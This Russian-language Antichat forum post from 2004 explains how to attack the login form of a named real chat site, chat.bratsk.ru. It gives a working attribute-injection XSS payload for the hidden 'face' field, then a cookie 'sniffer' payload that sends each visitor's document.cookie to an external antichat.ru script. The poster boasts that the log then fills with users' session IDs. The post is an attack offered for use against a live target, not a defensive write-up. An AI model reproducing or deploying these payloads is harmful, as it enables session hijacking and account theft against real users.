HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Чаты
Перезагрузить страницу Научите пожалуйста
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

  #14  
Старый 11.08.2004, 20:07
zFailure
Участник форума
Регистрация: 06.06.2004
Сообщений: 169
С нами: 11540434

Репутация: 82
По умолчанию
на http://chat.bratsk.ru есть форма входа

там есть поле
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE"><input name=face type=hidden value="1">[/QUOTE]<span id='postcolor'>
оно типа ваше лицо обозначает
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE"><img src="/images/1.gif" ...>[/QUOTE]<span id='postcolor'>

если запихнуть в это поле
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">" onError="alert(/ Чат поимели /)" z="[/QUOTE]<span id='postcolor'>

то после отсылке первогоже сообщения от вас, все будут любоваться мессагой

аналогично будем поступать со снифером
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">1.gif" onLoad="x=new Image();x.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;" z="[/QUOTE]<span id='postcolor'>

после входа и отправке сообщения
весь лог заполняется идентификаторами сессий
 
 



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.